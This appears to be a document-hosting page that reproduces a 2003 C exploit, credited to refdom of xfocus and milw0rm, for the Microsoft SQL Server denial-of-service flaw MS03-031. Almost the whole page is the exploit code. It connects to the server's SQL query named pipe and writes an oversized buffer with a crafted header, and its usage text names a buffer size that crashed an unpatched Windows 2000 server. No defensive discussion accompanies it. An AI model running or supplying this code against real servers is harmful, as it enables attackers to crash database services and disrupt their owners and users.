Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out

MS Windows SQL Server Denial of Service Remote Exploit MS03031

VIEWS: 42 PAGES: 3

									                      MS Windows SQL Server Denial of Service Remote Exploit MS03031      Page 1/3
  1    ////////////////////////////////////////////////////////////////
  2    //
  3    //      Microsoft SQL Server DoS Remote Exploit (MS03−031)
  4    //                    By refdom of xfocus
  5    //
  6    ////////////////////////////////////////////////////////////////
  7
  8    #include <stdio.h>
  9    #include <stdlib.h>
  10   #include <windows.h>
  11
  12
  13   void Usage()
  14   {
  15           printf("******************************************\n");
  16           printf("exp for Microsoft SQL Server DoS(MS03−031)\n\n");
  17           printf("\t Written by Refdom\n");
  18           printf("\t Email: refdom xfocus org\n");
  19           printf("\t Homepage: www.xfocus.org\n\n");
  20           printf("Usage: DOSMSSQL.exe server buffersize\n");
  21           printf("eg: DOSMSSQL.exe192.168.0.1 9000\n\n");
  22           printf("The buffersize depends on service pack level.\n");
  23           printf("I test it on my server: windows 2000, mssqlserver no sp.\n");
  24           printf("when buffersize is 9000, the server can be crashed.\n");
  25           printf("\n");
  26           printf("*******************************************\n\n");
  27   }
  28
  29
  30   int main(int argc, char* argv[])
  31   {
  32           char lpPipeName[50];
  33           char *lpBuffer = NULL;
  34           unsigned long ulSize = 0;
  35
  36             BOOL bResult;
  37             DWORD dwWritten = 0, dwMode;
  38             HANDLE hPipe;
  39
  40             Usage();
  41
  42             printf("Starting...\n");
  43
  44             if (argc != 3)
  45                     goto Exit0;
  46
  47             if (strlen(argv[1]) < 20)
  48             {
  49                     sprintf(lpPipeName, "\\\\%s\\\\.\\pipe\\sql\\query", argv[1]);
  50             }
  51             else
  52             {
refdom                                                                                    07/25/2003
                  MS Windows SQL Server Denial of Service Remote Exploit MS03031               Page 2/3
  53                    printf("Error!server\n");
  54                    goto Exit0;
  55          }
  56
  57          ulSize= atol(argv[2]);
  58
  59          lpBuffer = (char*)malloc(ulSize + 2);
  60          if (NULL == lpBuffer)
  61          {
  62                  printf("malloc error!\n");
  63                  goto Exit0;
  64          }
  65
  66          memset(lpBuffer, 0, ulSize + 2);
  67          memset(lpBuffer, ’A’, ulSize);
  68          *lpBuffer = ’\x12’;
  69          *(lpBuffer + 1) = ’\x01’;
  70          *(lpBuffer + 2) = ’\x00’;
  71
  72          printf("Connecting Server...\n");
  73
  74          hPipe = CreateFile(lpPipeName,
  75                                                GENERIC_READ | GENERIC_WRITE,
  76                                                0,
  77                                                NULL,
  78                                                OPEN_EXISTING,
  79                                                0,
  80                                                NULL);
  81          if (INVALID_HANDLE_VALUE == hPipe)
  82          {
  83                  printf("Error!Connect server!%d\n", GetLastError());
  84                  goto Exit0;
  85          }
  86
  87     dwMode = PIPE_READMODE_MESSAGE;
  88     bResult = SetNamedPipeHandleState(
  89        hPipe,     // pipe handle
  90        &dwMode, // new pipe mode
  91        NULL,      // don’t set maximum bytes
  92        NULL);     // don’t set maximum time
  93     if (!bResult)
  94     {
  95                   printf("Error!SetNamedPipeHandleState.%d\n", GetLastError());
  96                   goto Exit0;
  97     }
  98
  99          bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, NULL);
  100
  101         if (!bResult)
  102         {
  103                 printf("\n\tError!WriteFile.%d\n\n", GetLastError());
  104                 printf("When see the error message, the target may be crashed!!\n\n");
refdom                                                                                         07/25/2003
                     MS Windows SQL Server Denial of Service Remote Exploit MS03031   Page 3/3
  105                    goto Exit0;
  106            }
  107
  108   Exit0:
  109
  110            return 0;
  111   }
  112
  113   // milw0rm.com [2003−07−25]




refdom                                                                                07/25/2003

								
To top